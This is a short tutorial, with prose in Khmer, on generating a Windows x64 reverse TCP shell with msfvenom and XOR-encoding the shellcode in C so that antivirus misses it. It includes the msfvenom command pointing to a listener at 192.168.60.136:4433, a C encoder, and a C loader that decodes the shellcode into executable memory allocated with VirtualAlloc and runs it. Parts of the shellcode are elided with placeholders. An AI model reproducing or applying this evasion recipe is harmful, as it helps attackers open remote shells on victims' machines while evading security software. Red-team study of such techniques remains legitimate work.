Encrypting Shellcode with XOR In C

Summary

ខាងក្រោមជាការបង្កើត Shellcode និងធ្វើកូដនីយកម្ម XOR ដើម្បីបញ្ចៀសពីការរកឃើញរបស់កម្មវិធីកំចាត់មេរោគ ។

Generate Shellcode

ខាងក្រោមជាដំណើរការបង្កើត Payload ដោយប្រើប្រាស់ Shellcode ជាភាសារ C គោលដៅនៅលើម៉ាស៊ីន 64 bit ។

1

msfvenom -p windows/x64/shell_reverse_tcp lhost=192.168.60.136 lport=4433 -f c

Create XOR Encryption

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15


#include <stdio.h>
unsigned char code[] = 
"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x48\x3\xd2\x65\x48\[Original Shellcode]\x8b\x52\x18\x48"
"\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2\xf0\xb5\xa2\x56\xff\xd5";
int main()
{
 char key = 'K'; // RIGHT
 // char key = "K"; // WRONG
 int i = 0;
 for (i; i<sizeof(code); i++)
 {
  printf("\\x%02x",code[i]^key);
 }
}

Compile កូដខាងលើនោះយើងនឹងទទួលបាន Encryption Strings ថ្មីមួយ សូមចម្លងវាទុកដើម្បីដាក់ចូលទៅក្នុងកូដខាងក្រោមដើម្បី Decrypt កូដខាងលើ ។

Create XOR Decryption

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17


#include <stdio.h>
#include <windows.h>
unsigned char code[] = "\xb7\x03\xc8\xaf\[Decrypted Shellcode]\xa3\x87\x4b\x4b\x4b";
int main()
{
  char key = 'K';
  int i = 0;
  for (i; i<sizeof(code) - 1; i++)
{
  code[i] = code[i]^key;
}

  void *exec = VirtualAlloc(0, sizeof code, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  memcpy(exec, code, sizeof code);
  ((void(*)())exec)();
  return 0;
}

Compile Payload ខាងលើនោះយើងនឹងទទួលបាន Payload ចុងក្រោយ ៕

AV Scan Results

Scan Result